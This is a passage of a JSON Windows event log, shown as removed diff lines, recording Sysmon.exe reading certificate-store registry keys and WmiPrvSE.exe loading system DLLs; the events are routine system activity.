"HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573792290000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883573792290000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883573792290000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883573792290000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "image_load", - "image_name": "wmitomi.dll", - "image_path": "C:\\Windows\\System32\\wmitomi.dll", - "pid": 4036, - "process_name": "WmiPrvSE.exe", - "process_path": "C:\\Windows\\System32\\wbem\\WmiPrvSE.exe", - "timestamp": 131883573792460000, - "unique_pid": "{42FC7E13-CBE4-5C05-0000-00100C755501}" - }, - { - "event_type": "image_load", - "image_name": "mi.dll", - "image_path": "C:\\Windows\\System32\\mi.dll", - "pid": 4036, - "process_name": "WmiPrvSE.exe", - "process_path": "C:\\Windows\\System32\\wbem\\WmiPrvSE.exe", - "timestamp": 131883573792460000, - "unique_pid": "{42FC7E13-CBE4-5C05-0000-00100C755501}" - }, - { - "event_type": "image_load", - "image_name": "miutils.dll", - "image_path": "C:\\Windows\\System32\\miutils.dll", - "pid": 4036, - "process_name": "WmiPrvSE.exe", - "process_path": "C:\\Windows\\System32\\wbem\\WmiPrvSE.exe", - "timestamp": 131883573792460000, - "unique_pid": "{42FC7E13-CBE4-5C05-0000-00100C755501}" - }, - { - "event_type": "image_load", - "image_name": "NetAdapterCim.dll", - "image_path": "C:\\Windows\\System32\\wbem\\NetAdapterCim.dll", - "pid": 4036, - "process_name": "WmiPrvSE.exe", - "process_path": "C:\\Windows\\System32\\wbem\\WmiPrvSE.exe", - "timestamp": 131883573792140000, - "unique_pid": "{42FC7E13-CBE4-5C05-0000-00100C755501}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883573792460000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573792610000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573792610000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883573792610000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883573792610000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883573792610000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573792610000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883573792610000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883573792610000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883573792610000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573792610000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573792610000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883573792610000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883573792610000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883573792610000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573792610000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883573792610000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883573792610000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883573792610000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573792610000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573792610000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883573792610000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883573792610000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883573792610000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "image_load", - "image_name": "devobj.dll", - "image_path": "C:\\Windows\\System32\\devobj.dll", - "pid": 4036, - "process_name": "WmiPrvSE.exe", - "process_path": "C:\\Windows\\System32\\wbem\\WmiPrvSE.exe", - "timestamp": 131883573792290000, - "unique_pid": "{42FC7E13-CBE4-5C05-0000-00100C755501}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883573792610000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573792610000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573792610000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883573792610000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883573792610000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883573792610000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573792610000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883573792610000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883573792610000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883573792610000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573792610000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573792610000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883573792610000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883573792610000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883573792610000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573792610000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883573792610000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883573792610000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883573792610000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573792610000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "image_load", - "image_name": "NetSetupApi.dll", - "image_path": "C:\\Windows\\System32\\NetSetupApi.dll", - "pid": 4036, - "process_name": "WmiPrvSE.exe", - "process_path": "C:\\Windows\\System32\\wbem\\WmiPrvSE.exe", - "timestamp": 131883573792290000, - "unique_pid": "{42FC7E13-CBE4-5C05-0000-00100C755501}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573792610000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883573792610000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883573792610000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883573792610000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883573793230000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573793390000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573793390000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883573793390000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883573793390000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883573793390000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573793390000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883573793390000, - "unique_pid": 